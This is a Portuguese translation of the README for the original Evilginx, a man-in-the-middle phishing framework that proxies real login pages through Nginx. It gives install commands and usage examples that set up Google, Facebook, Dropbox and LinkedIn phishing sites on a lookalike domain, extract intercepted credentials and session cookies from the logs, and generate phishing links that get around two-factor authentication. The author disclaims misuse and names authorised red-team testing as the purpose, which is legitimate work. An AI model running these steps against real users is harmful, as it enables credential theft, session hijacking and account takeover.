
POR FAVOR, USE A NOVA VERSÃO: https://github.com/kgretzky/evilginx2

ESTA VERSÃO ESTÁ OBSOLETA. USE A VERSÃO MAIS RECENTE!
EVILGINX 2: https://github.com/kgretzky/evilginx2
O Evilginx é um framework de ataque man-in-the-middle usado para phishing de credenciais e cookies de sessão de qualquer serviço web. Seu núcleo roda no servidor HTTP Nginx, que utiliza proxy_pass e sub_filter para fazer proxy e modificar conteúdo HTTP, enquanto intercepta o tráfego entre cliente e servidor.
Você pode aprender como funciona e como instalar tudo no meu blog:
Primeiro post ligeiramente desatualizado agora: Evilginx - Phishing Avançado com Bypass de Autenticação de Dois Fatores
Atualização Evilginx 1.0: Evilginx 1.0 Atualização - Aprimore seu Jogo em Phishing com 2FA
Atualização Evilginx 1.1: Evilginx 1.1 Atualização
Estou ciente de que o Evilginx pode ser usado para propósitos muito nefastos. Este trabalho é meramente uma demonstração do que atacantes habilidosos podem fazer. É responsabilidade do defensor levar tais ataques em consideração ao configurar defesas e encontrar maneiras de se proteger contra este método de phishing. O Evilginx deve ser usado apenas em testes de penetração legítimos com permissão por escrito das partes que serão alvo de phishing.
O Evilginx fornece um script de instalação install.sh que cuida de instalar todo o pacote em qualquer máquina Debian wheezy/jessie, de forma automática e sem complicações.
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
Ative ou desative configurações de site para uso com o servidor Nginx, usando os templates Evilginx fornecidos do diretório sites.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
Liste os templates de configuração de site disponíveis:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
Ative o site de phishing do google com o domínio de phishing pré-registrado not-really-google.com:
python evilginx.py setup --enable google -d not-really-google.com
Desative o site de phishing do facebook:
python evilginx.py setup --disable facebook
Analise os logs do Nginx para extrair credenciais de login e cookies de sessão interceptados. Os logs, por padrão, são salvos no diretório logs, onde o script evilginx.py reside. Isso pode ser feito automaticamente após ativar a análise automática na fase de Configuração.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
Analise logs apenas para o site google:
python evilginx.py parse -s google
Analise logs para todos os sites disponíveis:
python evilginx.py parse -s all
Gere URLs de phishing que você pode usar em suas Avaliações de Red Team.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
Gere URL de phishing do google que redirecionará a vítima para o vídeo rick'roll em caso de login bem-sucedido:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ